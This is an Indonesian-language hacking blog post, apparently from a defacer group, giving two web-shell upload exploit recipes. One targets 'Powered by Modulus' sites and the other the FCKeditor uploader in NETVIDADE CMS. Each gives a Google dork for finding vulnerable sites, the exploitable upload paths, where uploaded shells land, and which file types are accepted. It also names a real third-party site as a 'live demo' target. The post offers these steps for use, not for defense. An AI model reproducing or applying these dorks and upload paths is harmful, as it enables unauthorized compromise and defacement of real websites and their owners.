Powered by Modulus -> Shell Upload Vulnerability


Assalamualaikum semua nya sahabat T.I Sniper yang berbahagia, kembali bersama saya BadBoy haha, mungkin sudah lama ya saya vakum, kenapa? Karena lagi males aja haha, susah dapetin cewek susah dapetin uang, huaaaa nangis saya.

Baiklah tanpa perlu panjang lebar lagi? mari kita lihat lihat yang satu ini, maaf ya, saya buat seperti ini

# Exploit Title : Site Linux Whm01.ast (Powered by Modulus) –> Shell Upload Vulnerability

# Date : 26-06-2012

# Google Dork : “Powered by Modulus” or inurl:filemanager/libraries/

# Author : BadBoy

# Category : Webapps

# Blog : http://fikri1995.blogspot.com

# Tested On : Windows XP

# Bug : http://localhost/modules/filemanager/libraries/filemanager/filemanager.php


http://localhost/modules/fckeditor/libraries/fckeditor/editor/filemanager/connectors/uploadtest.html <—- To know where the path

# Shell Access : http://localhost/modules/core/home/2/[HELL] or http://localhost/home/2/[HELL]

#Allowed File : php, html, asp, php4, txt, jpg, and more

#Live Demo : http://lakesidedairy.com/modules/filemanager/libraries/filemanager/filemanager.php

*I give you anythings what do you want, instant, and magic, so enjoyed, and read carefully my tutorial, hope your luck day*

Ringkas dan padat, semoga berguna ya caw dulu Pak, Bu, Mas, Mbak. Saya mau nonton haha, trik ini saya temukan tadi malem ni, terinspirasi dari tulisan Mbk Dhe itu artikel nya hehe.

oya aye tambahin age

# NETVIDADE CMS (FCKEDITOR) Arbitrary File Upload Vulnerability #

# Google Dork :"Desenvolvido por netvidade.com"

# Date: 2015-10-07

# Tested On : Win 7 / google chrome

# Gereetz to : Jomblo

# Exploit => plugins/fckeditor/editor/filemanager/connectors/uploadtest.html




# Letak File di : /ficheiros/conteudos/filemu.txt

NB : FILE APS diubah ke PHP

pilih filemu :3

tadi w cuman upload model .txt :v

contact : https://www.facebook.com/groups/Tisniper/


Okay la saya pamit dulu ya. Wassalamualaikum
